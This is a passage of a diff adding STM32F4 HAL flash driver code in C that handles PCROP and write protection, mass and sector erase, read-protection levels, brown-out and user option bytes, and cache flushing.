function can be used only for STM32F42xxx/STM32F43xxx/STM32F401xx/STM32F411xx/STM32F446xx/ + * STM32F469xx/STM32F479xx/STM32F412xx/STM32F413xx devices. + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_OB_SelectPCROP(void) +{ + uint8_t optiontmp = 0xFF; + + /* Mask SPRMOD bit */ + optiontmp = (uint8_t)((*(__IO uint8_t *)OPTCR_BYTE3_ADDRESS) & (uint8_t)0x7F); + + /* Update Option Byte */ + *(__IO uint8_t *)OPTCR_BYTE3_ADDRESS = (uint8_t)(OB_PCROP_SELECTED | optiontmp); + + return HAL_OK; +} + +/** + * @brief Deselect the Protection Mode + * + * @note After PCROP activated Option Byte modification NOT POSSIBLE! excepted + * Global Read Out Protection modification (from level1 to level0) + * @note Once SPRMOD bit is active unprotection of a protected sector is not possible + * @note Read a protected sector will set RDERR Flag and write a protected sector will set WRPERR Flag + * @note This function can be used only for STM32F42xxx/STM32F43xxx/STM32F401xx/STM32F411xx/STM32F446xx/ + * STM32F469xx/STM32F479xx/STM32F412xx/STM32F413xx devices. + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_OB_DeSelectPCROP(void) +{ + uint8_t optiontmp = 0xFF; + + /* Mask SPRMOD bit */ + optiontmp = (uint8_t)((*(__IO uint8_t *)OPTCR_BYTE3_ADDRESS) & (uint8_t)0x7F); + + /* Update Option Byte */ + *(__IO uint8_t *)OPTCR_BYTE3_ADDRESS = (uint8_t)(OB_PCROP_DESELECTED | optiontmp); + + return HAL_OK; +} +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F401xC || STM32F401xE || STM32F410xx ||\ + STM32F411xE || STM32F469xx || STM32F479xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || + STM32F413xx || STM32F423xx */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx)|| defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) +/** + * @brief Returns the FLASH Write Protection Option Bytes value for Bank 2 + * @note This function can be used only for STM32F42xxx/STM32F43xxx/STM32F469xx/STM32F479xx devices. + * @retval The FLASH Write Protection Option Bytes value + */ +uint16_t HAL_FLASHEx_OB_GetBank2WRP(void) +{ + /* Return the FLASH write protection Register value */ + return (*(__IO uint16_t *)(OPTCR1_BYTE2_ADDRESS)); +} +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ + +/** + * @} + */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) +/** + * @brief Full erase of FLASH memory sectors + * @param VoltageRange The device voltage range which defines the erase parallelism. + * This parameter can be one of the following values: + * @arg FLASH_VOLTAGE_RANGE_1: when the device voltage range is 1.8V to 2.1V, + * the operation will be done by byte (8-bit) + * @arg FLASH_VOLTAGE_RANGE_2: when the device voltage range is 2.1V to 2.7V, + * the operation will be done by half word (16-bit) + * @arg FLASH_VOLTAGE_RANGE_3: when the device voltage range is 2.7V to 3.6V, + * the operation will be done by word (32-bit) + * @arg FLASH_VOLTAGE_RANGE_4: when the device voltage range is 2.7V to 3.6V + External Vpp, + * the operation will be done by double word (64-bit) + * + * @param Banks Banks to be erased + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: Bank1 to be erased + * @arg FLASH_BANK_2: Bank2 to be erased + * @arg FLASH_BANK_BOTH: Bank1 and Bank2 to be erased + * + * @retval HAL Status + */ +static void FLASH_MassErase(uint8_t VoltageRange, uint32_t Banks) +{ + /* Check the parameters */ + assert_param(IS_VOLTAGERANGE(VoltageRange)); + assert_param(IS_FLASH_BANK(Banks)); + + /* if the previous operation is completed, proceed to erase all sectors */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + + if (Banks == FLASH_BANK_BOTH) + { + /* bank1 & bank2 will be erased*/ + FLASH->CR |= FLASH_MER_BIT; + } + else if (Banks == FLASH_BANK_1) + { + /*Only bank1 will be erased*/ + FLASH->CR |= FLASH_CR_MER1; + } + else + { + /*Only bank2 will be erased*/ + FLASH->CR |= FLASH_CR_MER2; + } + FLASH->CR |= FLASH_CR_STRT | ((uint32_t)VoltageRange << 8U); +} + +/** + * @brief Erase the specified FLASH memory sector + * @param Sector FLASH sector to erase + * The value of this parameter depend on device used within the same series + * @param VoltageRange The device voltage range which defines the erase parallelism. + * This parameter can be one of the following values: + * @arg FLASH_VOLTAGE_RANGE_1: when the device voltage range is 1.8V to 2.1V, + * the operation will be done by byte (8-bit) + * @arg FLASH_VOLTAGE_RANGE_2: when the device voltage range is 2.1V to 2.7V, + * the operation will be done by half word (16-bit) + * @arg FLASH_VOLTAGE_RANGE_3: when the device voltage range is 2.7V to 3.6V, + * the operation will be done by word (32-bit) + * @arg FLASH_VOLTAGE_RANGE_4: when the device voltage range is 2.7V to 3.6V + External Vpp, + * the operation will be done by double word (64-bit) + * + * @retval None + */ +void FLASH_Erase_Sector(uint32_t Sector, uint8_t VoltageRange) +{ + uint32_t tmp_psize = 0U; + + /* Check the parameters */ + assert_param(IS_FLASH_SECTOR(Sector)); + assert_param(IS_VOLTAGERANGE(VoltageRange)); + + if (VoltageRange == FLASH_VOLTAGE_RANGE_1) + { + tmp_psize = FLASH_PSIZE_BYTE; + } + else if (VoltageRange == FLASH_VOLTAGE_RANGE_2) + { + tmp_psize = FLASH_PSIZE_HALF_WORD; + } + else if (VoltageRange == FLASH_VOLTAGE_RANGE_3) + { + tmp_psize = FLASH_PSIZE_WORD; + } + else + { + tmp_psize = FLASH_PSIZE_DOUBLE_WORD; + } + + /* Need to add offset of 4 when sector higher than FLASH_SECTOR_11 */ + if (Sector > FLASH_SECTOR_11) + { + Sector += 4U; + } + /* If the previous operation is completed, proceed to erase the sector */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= tmp_psize; + CLEAR_BIT(FLASH->CR, FLASH_CR_SNB); + FLASH->CR |= FLASH_CR_SER | (Sector << FLASH_CR_SNB_Pos); + FLASH->CR |= FLASH_CR_STRT; +} + +/** + * @brief Enable the write protection of the desired bank1 or bank 2 sectors + * + * @note When the memory read protection level is selected (RDP level = 1), + * it is not possible to program or erase the flash sector i if CortexM4 + * debug features are connected or boot code is executed in RAM, even if nWRPi = 1 + * @note Active value of nWRPi bits is inverted when PCROP mode is active (SPRMOD =1). + * + * @param WRPSector specifies the sector(s) to be write protected. + * This parameter can be one of the following values: + * @arg WRPSector: A value between OB_WRP_SECTOR_0 and OB_WRP_SECTOR_23 + * @arg OB_WRP_SECTOR_All + * @note BANK2 starts from OB_WRP_SECTOR_12 + * + * @param Banks Enable write protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: WRP on all sectors of bank1 + * @arg FLASH_BANK_2: WRP on all sectors of bank2 + * @arg FLASH_BANK_BOTH: WRP on all sectors of bank1 & bank2 + * + * @retval HAL FLASH State + */ +static HAL_StatusTypeDef FLASH_OB_EnableWRP(uint32_t WRPSector, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_WRP_SECTOR(WRPSector)); + assert_param(IS_FLASH_BANK(Banks)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + if (((WRPSector == OB_WRP_SECTOR_All) && ((Banks == FLASH_BANK_1) || (Banks == FLASH_BANK_BOTH))) || + (WRPSector < OB_WRP_SECTOR_12)) + { + if (WRPSector == OB_WRP_SECTOR_All) + { + /*Write protection on all sector of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS &= (~(WRPSector >> 12)); + } + else + { + /*Write protection done on sectors of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS &= (~WRPSector); + } + } + else + { + /*Write protection done on sectors of BANK2*/ + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS &= (~(WRPSector >> 12)); + } + + /*Write protection on all sector of BANK2*/ + if ((WRPSector == OB_WRP_SECTOR_All) && (Banks == FLASH_BANK_BOTH)) + { + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS &= (~(WRPSector >> 12)); + } + } + + } + return status; +} + +/** + * @brief Disable the write protection of the desired bank1 or bank 2 sectors + * + * @note When the memory read protection level is selected (RDP level = 1), + * it is not possible to program or erase the flash sector i if CortexM4 + * debug features are connected or boot code is executed in RAM, even if nWRPi = 1 + * @note Active value of nWRPi bits is inverted when PCROP mode is active (SPRMOD =1). + * + * @param WRPSector specifies the sector(s) to be write protected. + * This parameter can be one of the following values: + * @arg WRPSector: A value between OB_WRP_SECTOR_0 and OB_WRP_SECTOR_23 + * @arg OB_WRP_Sector_All + * @note BANK2 starts from OB_WRP_SECTOR_12 + * + * @param Banks Disable write protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: Bank1 to be erased + * @arg FLASH_BANK_2: Bank2 to be erased + * @arg FLASH_BANK_BOTH: Bank1 and Bank2 to be erased + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_DisableWRP(uint32_t WRPSector, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_WRP_SECTOR(WRPSector)); + assert_param(IS_FLASH_BANK(Banks)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + if (((WRPSector == OB_WRP_SECTOR_All) && ((Banks == FLASH_BANK_1) || (Banks == FLASH_BANK_BOTH))) || + (WRPSector < OB_WRP_SECTOR_12)) + { + if (WRPSector == OB_WRP_SECTOR_All) + { + /*Write protection on all sector of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS |= (uint16_t)(WRPSector >> 12); + } + else + { + /*Write protection done on sectors of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS |= (uint16_t)WRPSector; + } + } + else + { + /*Write protection done on sectors of BANK2*/ + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS |= (uint16_t)(WRPSector >> 12); + } + + /*Write protection on all sector of BANK2*/ + if ((WRPSector == OB_WRP_SECTOR_All) && (Banks == FLASH_BANK_BOTH)) + { + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS |= (uint16_t)(WRPSector >> 12); + } + } + + } + + return status; +} + +/** + * @brief Configure the Dual Bank Boot. + * + * @note This function can be used only for STM32F42xxx/43xxx devices. + * + * @param BootConfig specifies the Dual Bank Boot Option byte. + * This parameter can be one of the following values: + * @arg OB_Dual_BootEnabled: Dual Bank Boot Enable + * @arg OB_Dual_BootDisabled: Dual Bank Boot Disabled + * @retval None + */ +static HAL_StatusTypeDef FLASH_OB_BootConfig(uint8_t BootConfig) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_BOOT(BootConfig)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + /* Set Dual Bank Boot */ + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS &= (~FLASH_OPTCR_BFB2); + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS |= BootConfig; + } + + return status; +} + +/** + * @brief Enable the read/write protection (PCROP) of the desired + * sectors of Bank 1 and/or Bank 2. + * @note This function can be used only for STM32F42xxx/43xxx devices. + * @param SectorBank1 Specifies the sector(s) to be read/write protected or unprotected for bank1. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_SECTOR_0 and OB_PCROP_SECTOR_11 + * @arg OB_PCROP_SECTOR__All + * @param SectorBank2 Specifies the sector(s) to be read/write protected or unprotected for bank2. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_SECTOR_12 and OB_PCROP_SECTOR_23 + * @arg OB_PCROP_SECTOR__All + * @param Banks Enable PCROP protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: WRP on all sectors of bank1 + * @arg FLASH_BANK_2: WRP on all sectors of bank2 + * @arg FLASH_BANK_BOTH: WRP on all sectors of bank1 & bank2 + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_EnablePCROP(uint32_t SectorBank1, uint32_t SectorBank2, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + assert_param(IS_FLASH_BANK(Banks)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + if ((Banks == FLASH_BANK_1) || (Banks == FLASH_BANK_BOTH)) + { + assert_param(IS_OB_PCROP(SectorBank1)); + /*Write protection done on sectors of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS |= (uint16_t)SectorBank1; + } + else + { + assert_param(IS_OB_PCROP(SectorBank2)); + /*Write protection done on sectors of BANK2*/ + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS |= (uint16_t)SectorBank2; + } + + /*Write protection on all sector of BANK2*/ + if (Banks == FLASH_BANK_BOTH) + { + assert_param(IS_OB_PCROP(SectorBank2)); + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + /*Write protection done on sectors of BANK2*/ + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS |= (uint16_t)SectorBank2; + } + } + + } + + return status; +} + + +/** + * @brief Disable the read/write protection (PCROP) of the desired + * sectors of Bank 1 and/or Bank 2. + * @note This function can be used only for STM32F42xxx/43xxx devices. + * @param SectorBank1 specifies the sector(s) to be read/write protected or unprotected for bank1. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_SECTOR_0 and OB_PCROP_SECTOR_11 + * @arg OB_PCROP_SECTOR__All + * @param SectorBank2 Specifies the sector(s) to be read/write protected or unprotected for bank2. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_SECTOR_12 and OB_PCROP_SECTOR_23 + * @arg OB_PCROP_SECTOR__All + * @param Banks Disable PCROP protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: WRP on all sectors of bank1 + * @arg FLASH_BANK_2: WRP on all sectors of bank2 + * @arg FLASH_BANK_BOTH: WRP on all sectors of bank1 & bank2 + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_DisablePCROP(uint32_t SectorBank1, uint32_t SectorBank2, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_FLASH_BANK(Banks)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + if ((Banks == FLASH_BANK_1) || (Banks == FLASH_BANK_BOTH)) + { + assert_param(IS_OB_PCROP(SectorBank1)); + /*Write protection done on sectors of BANK1*/ + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS &= (~SectorBank1); + } + else + { + /*Write protection done on sectors of BANK2*/ + assert_param(IS_OB_PCROP(SectorBank2)); + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS &= (~SectorBank2); + } + + /*Write protection on all sector of BANK2*/ + if (Banks == FLASH_BANK_BOTH) + { + assert_param(IS_OB_PCROP(SectorBank2)); + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + /*Write protection done on sectors of BANK2*/ + *(__IO uint16_t *)OPTCR1_BYTE2_ADDRESS &= (~SectorBank2); + } + } + + } + + return status; + +} + +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) ||\ + defined(STM32F410Rx) || defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) ||\ + defined(STM32F423xx) +/** + * @brief Mass erase of FLASH memory + * @param VoltageRange The device voltage range which defines the erase parallelism. + * This parameter can be one of the following values: + * @arg FLASH_VOLTAGE_RANGE_1: when the device voltage range is 1.8V to 2.1V, + * the operation will be done by byte (8-bit) + * @arg FLASH_VOLTAGE_RANGE_2: when the device voltage range is 2.1V to 2.7V, + * the operation will be done by half word (16-bit) + * @arg FLASH_VOLTAGE_RANGE_3: when the device voltage range is 2.7V to 3.6V, + * the operation will be done by word (32-bit) + * @arg FLASH_VOLTAGE_RANGE_4: when the device voltage range is 2.7V to 3.6V + External Vpp, + * the operation will be done by double word (64-bit) + * + * @param Banks Banks to be erased + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: Bank1 to be erased + * + * @retval None + */ +static void FLASH_MassErase(uint8_t VoltageRange, uint32_t Banks) +{ + /* Check the parameters */ + assert_param(IS_VOLTAGERANGE(VoltageRange)); + assert_param(IS_FLASH_BANK(Banks)); + UNUSED(Banks); + + /* If the previous operation is completed, proceed to erase all sectors */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= FLASH_CR_MER; + FLASH->CR |= FLASH_CR_STRT | ((uint32_t)VoltageRange << 8U); +} + +/** + * @brief Erase the specified FLASH memory sector + * @param Sector FLASH sector to erase + * The value of this parameter depend on device used within the same series + * @param VoltageRange The device voltage range which defines the erase parallelism. + * This parameter can be one of the following values: + * @arg FLASH_VOLTAGE_RANGE_1: when the device voltage range is 1.8V to 2.1V, + * the operation will be done by byte (8-bit) + * @arg FLASH_VOLTAGE_RANGE_2: when the device voltage range is 2.1V to 2.7V, + * the operation will be done by half word (16-bit) + * @arg FLASH_VOLTAGE_RANGE_3: when the device voltage range is 2.7V to 3.6V, + * the operation will be done by word (32-bit) + * @arg FLASH_VOLTAGE_RANGE_4: when the device voltage range is 2.7V to 3.6V + External Vpp, + * the operation will be done by double word (64-bit) + * + * @retval None + */ +void FLASH_Erase_Sector(uint32_t Sector, uint8_t VoltageRange) +{ + uint32_t tmp_psize = 0U; + + /* Check the parameters */ + assert_param(IS_FLASH_SECTOR(Sector)); + assert_param(IS_VOLTAGERANGE(VoltageRange)); + + if (VoltageRange == FLASH_VOLTAGE_RANGE_1) + { + tmp_psize = FLASH_PSIZE_BYTE; + } + else if (VoltageRange == FLASH_VOLTAGE_RANGE_2) + { + tmp_psize = FLASH_PSIZE_HALF_WORD; + } + else if (VoltageRange == FLASH_VOLTAGE_RANGE_3) + { + tmp_psize = FLASH_PSIZE_WORD; + } + else + { + tmp_psize = FLASH_PSIZE_DOUBLE_WORD; + } + + /* If the previous operation is completed, proceed to erase the sector */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= tmp_psize; + CLEAR_BIT(FLASH->CR, FLASH_CR_SNB); + FLASH->CR |= FLASH_CR_SER | (Sector << FLASH_CR_SNB_Pos); + FLASH->CR |= FLASH_CR_STRT; +} + +/** + * @brief Enable the write protection of the desired bank 1 sectors + * + * @note When the memory read protection level is selected (RDP level = 1), + * it is not possible to program or erase the flash sector i if CortexM4 + * debug features are connected or boot code is executed in RAM, even if nWRPi = 1 + * @note Active value of nWRPi bits is inverted when PCROP mode is active (SPRMOD =1). + * + * @param WRPSector specifies the sector(s) to be write protected. + * The value of this parameter depend on device used within the same series + * + * @param Banks Enable write protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: WRP on all sectors of bank1 + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_EnableWRP(uint32_t WRPSector, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_WRP_SECTOR(WRPSector)); + assert_param(IS_FLASH_BANK(Banks)); + UNUSED(Banks); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS &= (~WRPSector); + } + + return status; +} + +/** + * @brief Disable the write protection of the desired bank 1 sectors + * + * @note When the memory read protection level is selected (RDP level = 1), + * it is not possible to program or erase the flash sector i if CortexM4 + * debug features are connected or boot code is executed in RAM, even if nWRPi = 1 + * @note Active value of nWRPi bits is inverted when PCROP mode is active (SPRMOD =1). + * + * @param WRPSector specifies the sector(s) to be write protected. + * The value of this parameter depend on device used within the same series + * + * @param Banks Enable write protection on all the sectors for the specific bank + * This parameter can be one of the following values: + * @arg FLASH_BANK_1: WRP on all sectors of bank1 + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_DisableWRP(uint32_t WRPSector, uint32_t Banks) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_WRP_SECTOR(WRPSector)); + assert_param(IS_FLASH_BANK(Banks)); + UNUSED(Banks); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS |= (uint16_t)WRPSector; + } + + return status; +} +#endif /* STM32F40xxx || STM32F41xxx || STM32F401xx || STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx + STM32F413xx || STM32F423xx */ + +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) ||\ + defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) ||\ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Enable the read/write protection (PCROP) of the desired sectors. + * @note This function can be used only for STM32F401xx devices. + * @param Sector specifies the sector(s) to be read/write protected or unprotected. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_Sector0 and OB_PCROP_Sector5 + * @arg OB_PCROP_Sector_All + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_EnablePCROP(uint32_t Sector) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_PCROP(Sector)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS |= (uint16_t)Sector; + } + + return status; +} + + +/** + * @brief Disable the read/write protection (PCROP) of the desired sectors. + * @note This function can be used only for STM32F401xx devices. + * @param Sector specifies the sector(s) to be read/write protected or unprotected. + * This parameter can be one of the following values: + * @arg OB_PCROP: A value between OB_PCROP_Sector0 and OB_PCROP_Sector5 + * @arg OB_PCROP_Sector_All + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_DisablePCROP(uint32_t Sector) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_PCROP(Sector)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint16_t *)OPTCR_BYTE2_ADDRESS &= (~Sector); + } + + return status; + +} +#endif /* STM32F401xC || STM32F401xE || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx + STM32F413xx || STM32F423xx */ + +/** + * @brief Set the read protection level. + * @param Level specifies the read protection level. + * This parameter can be one of the following values: + * @arg OB_RDP_LEVEL_0: No protection + * @arg OB_RDP_LEVEL_1: Read protection of the memory + * @arg OB_RDP_LEVEL_2: Full chip protection + * + * @note WARNING: When enabling OB_RDP level 2 it's no more possible to go back to level 1 or 0 + * + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_RDP_LevelConfig(uint8_t Level) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_RDP_LEVEL(Level)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + *(__IO uint8_t *)OPTCR_BYTE1_ADDRESS = Level; + } + + return status; +} + +/** + * @brief Program the FLASH User Option Byte: IWDG_SW / RST_STOP / RST_STDBY. + * @param Iwdg Selects the IWDG mode + * This parameter can be one of the following values: + * @arg OB_IWDG_SW: Software IWDG selected + * @arg OB_IWDG_HW: Hardware IWDG selected + * @param Stop Reset event when entering STOP mode. + * This parameter can be one of the following values: + * @arg OB_STOP_NO_RST: No reset generated when entering in STOP + * @arg OB_STOP_RST: Reset generated when entering in STOP + * @param Stdby Reset event when entering Standby mode. + * This parameter can be one of the following values: + * @arg OB_STDBY_NO_RST: No reset generated when entering in STANDBY + * @arg OB_STDBY_RST: Reset generated when entering in STANDBY + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_UserConfig(uint8_t Iwdg, uint8_t Stop, uint8_t Stdby) +{ + uint8_t optiontmp = 0xFF; + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_OB_IWDG_SOURCE(Iwdg)); + assert_param(IS_OB_STOP_SOURCE(Stop)); + assert_param(IS_OB_STDBY_SOURCE(Stdby)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + /* Mask OPTLOCK, OPTSTRT, BOR_LEV and BFB2 bits */ + optiontmp = (uint8_t)((*(__IO uint8_t *)OPTCR_BYTE0_ADDRESS) & (uint8_t)0x1F); + + /* Update User Option Byte */ + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS = Iwdg | (uint8_t)(Stdby | (uint8_t)(Stop | ((uint8_t)optiontmp))); + } + + return status; +} + +/** + * @brief Set the BOR Level. + * @param Level specifies the Option Bytes BOR Reset Level. + * This parameter can be one of the following values: + * @arg OB_BOR_LEVEL3: Supply voltage ranges from 2.7 to 3.6 V + * @arg OB_BOR_LEVEL2: Supply voltage ranges from 2.4 to 2.7 V + * @arg OB_BOR_LEVEL1: Supply voltage ranges from 2.1 to 2.4 V + * @arg OB_BOR_OFF: Supply voltage ranges from 1.62 to 2.1 V + * @retval HAL Status + */ +static HAL_StatusTypeDef FLASH_OB_BOR_LevelConfig(uint8_t Level) +{ + /* Check the parameters */ + assert_param(IS_OB_BOR_LEVEL(Level)); + + /* Set the BOR Level */ + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS &= (~FLASH_OPTCR_BOR_LEV); + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS |= Level; + + return HAL_OK; + +} + +/** + * @brief Return the FLASH User Option Byte value. + * @retval uint8_t FLASH User Option Bytes values: IWDG_SW(Bit0), RST_STOP(Bit1) + * and RST_STDBY(Bit2). + */ +static uint8_t FLASH_OB_GetUser(void) +{ + /* Return the User Option Byte */ + return ((uint8_t)(FLASH->OPTCR & 0xE0)); +} + +/** + * @brief Return the FLASH Write Protection Option Bytes value. + * @retval uint16_t FLASH Write Protection Option Bytes value + */ +static uint16_t FLASH_OB_GetWRP(void) +{ + /* Return the FLASH write protection Register value */ + return (*(__IO uint16_t *)(OPTCR_BYTE2_ADDRESS)); +} + +/** + * @brief Returns the FLASH Read Protection level. + * @retval FLASH ReadOut Protection Status: + * This parameter can be one of the following values: + * @arg OB_RDP_LEVEL_0: No protection + * @arg OB_RDP_LEVEL_1: Read protection of the memory + * @arg OB_RDP_LEVEL_2: Full chip protection + */ +static uint8_t FLASH_OB_GetRDP(void) +{ + uint8_t readstatus = OB_RDP_LEVEL_0; + + if (*(__IO uint8_t *)(OPTCR_BYTE1_ADDRESS) == (uint8_t)OB_RDP_LEVEL_2) + { + readstatus = OB_RDP_LEVEL_2; + } + else if (*(__IO uint8_t *)(OPTCR_BYTE1_ADDRESS) == (uint8_t)OB_RDP_LEVEL_0) + { + readstatus = OB_RDP_LEVEL_0; + } + else + { + readstatus = OB_RDP_LEVEL_1; + } + + return readstatus; +} + +/** + * @brief Returns the FLASH BOR level. + * @retval uint8_t The FLASH BOR level: + * - OB_BOR_LEVEL3: Supply voltage ranges from 2.7 to 3.6 V + * - OB_BOR_LEVEL2: Supply voltage ranges from 2.4 to 2.7 V + * - OB_BOR_LEVEL1: Supply voltage ranges from 2.1 to 2.4 V + * - OB_BOR_OFF : Supply voltage ranges from 1.62 to 2.1 V + */ +static uint8_t FLASH_OB_GetBOR(void) +{ + /* Return the FLASH BOR level */ + return (uint8_t)(*(__IO uint8_t *)(OPTCR_BYTE0_ADDRESS) & (uint8_t)0x0C); +} + +/** + * @brief Flush the instruction and data caches + * @retval None + */ +void FLASH_FlushCaches(void) +{ + /* Flush instruction cache */ + if (READ_BIT(FLASH->ACR, FLASH_ACR_ICEN) != RESET) + { + /* Disable instruction cache */ + __HAL_FLASH_INSTRUCTION_CACHE_DISABLE(); + /* Reset instruction cache */ + __HAL_FLASH_INSTRUCTION_CACHE_RESET(); + 